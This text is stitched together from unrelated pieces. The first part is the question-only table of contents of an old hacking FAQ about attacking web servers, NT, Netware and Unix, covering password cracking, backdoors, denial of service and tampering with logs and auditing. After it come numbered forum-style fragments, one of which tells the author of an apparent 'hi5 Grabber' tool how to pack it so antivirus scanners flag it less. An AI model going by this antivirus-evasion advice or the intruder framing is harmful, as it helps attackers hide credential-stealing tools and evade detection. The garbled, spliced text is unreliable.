    What is phf? What's the "test" hack? What about that "~" character? What is the jj.c problem? What's the deal with forms? What will this look like in the target's log files? What's the deal with Server-Side Includes? What if SSIs are turned on but includes are stripped from user input? What are SSL? How can I attack anonymously? What is the asp dot attack? What is the campas attack? What is the count.cgi attack? What is the faxsurvey attack? What about finger.cgi? What is the glimpse exploit? What are some other CGI scripts that allow remote command execution? What are the MetaInfo attacks?

    10.0 The Basic Web Server
    What are the big weak spots on servers? What are the critical files? What's the difference between httpd running as a daemon vs. running under inetd? How does the server resolve paths? What log files are used by the server? How do access restrictions work? How do password restrictions work? What is web spoofing?

    11.0 NT Basics
    What are the components of NT security? How does the authentication of a user actually work? What is "standalone" vs. "workgroup" vs. "domain"? What is a Service Pack? What is a Hot Fix? Where are Service Packs and Hot Fixes? What's with "C2 certification"? Are there any interesting default groups to be aware of? What are the default directory permissions? Are there any special restrictions surrounding the Administrative Tools group in Presentation Manager? What is the Registry? What are hives? Why is the Registry like this and why do I care? What is the deal with Microsoft's implementation of PPTP?

    12.0 NT Accounts
    What are common accounts and passwords in NT? What if the Sys Admin has renamed the Administrator account? How can I figure out valid account names for NT? What can null sessions to an NT machine tell me?

    13.0 NT Passwords
    How do I access the password file in NT? What do I do with a copy of SAM? What's the full story with NT passwords? How does brute force password cracking work with NT? How does dictionary password cracking work with NT? I lost the NT Administrator password. What do I do? How does a Sys Admin enforce better passwords? Can a Sys Admin prevent/stop SAM extraction? How is password changing related to "last login time"?

    14.0 NT Console Attacks
    What does direct console access for NT get me? What about NT's file system? What is Netmon and why do I care?

    15.0 NT Client Attacks
    What is GetAdmin.exe and Crash4.exe? Should I even try for local administrator access? I have guest remote access. How can I get administrator access? What about %systemroot%\system32 being writeable? What if the permissions are restricted on the server? What exactly does the NetBios Auditing Tool do? What is the "Red Button" bug? What about forging DNS packets for subversive purposes? What about shares? How do I get around a packet filter-based firewall? I hack from my Linux box. How can I do all that GUI stuff on remote NT servers? What's the story with WinGate? How do I find these buggy WinGates I can use?

    16.0 NT Denial of Service
    What can telnet give me in the way of denial of service? What can I do with Samba? What's with ROLLBACK.EXE? What is an OOB attack? Are there any other Denial of Service attacks?

    17.0 NT Logging and Backdoors
    Where are the common log files in NT? How do I edit/change NT log files without being detected? So how can I view/clear/edit the Security Log? How can I turn off auditing in NT?

    18.0 NT Misc. Attack Info
    How is file and directory security enforced? What is NTFS? Are there any vulnerabilities to NTFS and access controls? What is Samba and why is it important? How do I bypass the screen saver? How can I detect that a machine is in fact NT on the network? Can I do on-the-fly disk encryption on NT? Does the FTP service allow passive connections? What is this "port scanning" you are talking about? Does NT have bugs like Unix' sendmail? How is password changing related to "last login time"? Can sessions be hijacked? Are "man in the middle" attacks possible? What about TCP Sequence Number Prediction? What's the story with buffer overflows on NT?

    19.0 Netware Accounts
    What are common accounts and passwords for Netware? How can I figure out valid account names on Netware?

    20.0 Netware Passwords
    How do I access the password file in Netware? What's the full story with Netware passwords? How does password cracking work with Netware? How does password cracking work with Netware? Can a Sys Admin prevent/stop Netware password hash extraction? Can I reset an NDS password with just limited rights? What is OS2NT.NLM? How does password encryption work? Can I login without a password? What's with Windows 95 and Netware passwords?

    21.0 Netware Console Attacks
    What's the "secret" way to get Supe access Novell once taught CNE's? How do I use SETPWD.NLM? I don't have SETPWD.NLM or a disk editor. How can I get Supe access? What's the "debug" way to disable passwords? How do I defeat console logging? Can I set the RCONSOLE password to work for just Supervisor? How can I get around a locked MONITOR? Where are the Login Scripts stored in Netware 4.x and can I edit them? What if I can't see SYS:_NETWARE? So how do I access SYS:_NETWARE? How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF? What else can be done with console access?

    22.0 Netware Client Attacks
    What is the cheesy way to get Supervisor access? How can I login without running the System Login Script in Netware 3.x? How can I get IP info from a Netware server remotely? Does 4.x store the LOGIN password to a temporary file? Everyone can make themselves equivalent to anyone including Admin. How? Can Windows 95 bypass NetWare user security? What is Packet Signature and how do I get around it?

    23.0 Netware Denial of Service
    How can I abend a Netware server? Will Windows 95 cause server problems for Netware? Will Windows 95 cause network problems for Netware?

    24.0 Netware Logging and Backdoors
    How do I leave a backdoor for Netware? What is the rumored "backdoor" in NDS? What is the bindery backdoor in Netware 4.x? Where are the common log files in Netware? What is Accounting? How do I defeat Accounting? What is Intruder Detection? How do I check for Intruder Detection? What are station/time restrictions? How can I tell if something is being Audited in Netware 4.x? How can I remove Auditing if I lost the Audit password? What is interesting about Netware 4.x's licensing? What is the Word Perfect 5.1 trick when running Netware 3.x over DOS?

    25.0 Netware Misc. Attack Info
    How do I spoof my node or IP address? How can I see hidden files and directories? How do I defeat the execute-only flag? How can I hide my presence after altering files? What is a Netware-aware trojan? What are Trustee Directory Assignments? Are there any default Trustee Assignments that can be exploited? What are some general ways to exploit Trustee Rights? Can access to .NCF files help me? Can someone think they've logged out and I walk up and take over? What other Novell and third party programs have holes that give "too much access"? How can I get around disk space requirements? How do I remotely reboot a Netware 3.x file server? What is Netware NFS and is it secure? Can sniffing packets help me break into Netware servers? What else can sniffing around Netware get me? Do any Netware utilities have holes like Unix utilities? Where can I get the Netware APIs? Are there alternatives to Netware's APIs? How can I remove NDS? What are security considerations regarding partitions of the tree? Can a department "Supe" become a regular Admin to the entire tree? Are there products to help improve Netware's security? Is Netware's Web server secure? What's the story with Netware's FTP NLM? Can an IntranetWare server be compromised from the Internet? Are there any problems with Novell's Groupwise? Are there any problems with Netware's Macintosh namespace? What's the story with buffer overflows on Netware?

    26.0 Netware Mathematical/Theoretical Info
    How does the whole password/login/encryption thing work? Are "man in the middle" attacks possible? Are Netware-aware viruses possible? Can a trojaned LOGIN.EXE be inserted during the login process? Is anything "vulnerable" during a password change? Is "data diddling" possible?

    27.0 Unix Accounts
    What are common accounts and passwords for Unix? How can I figure out valid account names for Unix?

    28.0 Unix Passwords
    How do I access the password file in Unix? What's the full story with Unix passwords? How does brute force password cracking work with Unix? How does dictionary password cracking work with Unix? How does a Sys Admin enforce better passwords and password management? So how do I get to those shadowed passwords? So what can I learn with a password file from a heavily secured system? What's the story with SRP?

    29.0 Unix Local Attacks
    Why attack locally? How do most exploits work? So how does a buffer overflow work?

    30.0 Unix Remote Attacks
    What are remote hacks?

    31.0 Unix Logging
    Where are the common log files in Unix? How do I edit/change the log files for Unix?

    32.0 Hacker Resources
    What are some security-related WWW locations? What are some security-related USENET groups? What are some security-related mailing lists? What are some other FAQs?
  22. Video on the Web - Dive Into HTML5 Dive Into HTML5, a ten-out-of-ten site.
  23. how many people do you think know C? and how many do you think know asm? work out the ratio and multiply the salary by that ratio. that's how much cp/m will earn if he keeps going on the asm side. someone who knows asm is far more valuable (being rarer to come across) than someone who knows C. a2480f25: Why is reinventing the wheel a good thing ?
  24. begood

    Hello

    Welcome, Iulian.
  25. You could also set up the page SourceForge.net: hi5 Grabber - Project Web Hosting - Open Source Software. Besides that, create a video tutorial - how to use it - for the idiots, of whom there are many; you'll get traffic and downloads. http://www.virustotal.com/analisis/4517f19a305215009a57b4404737a310abb3f0e3d42707993f201a26b6d720a1-1274624351 stop encrypting it with yoda crypter. upx isn't recommended either...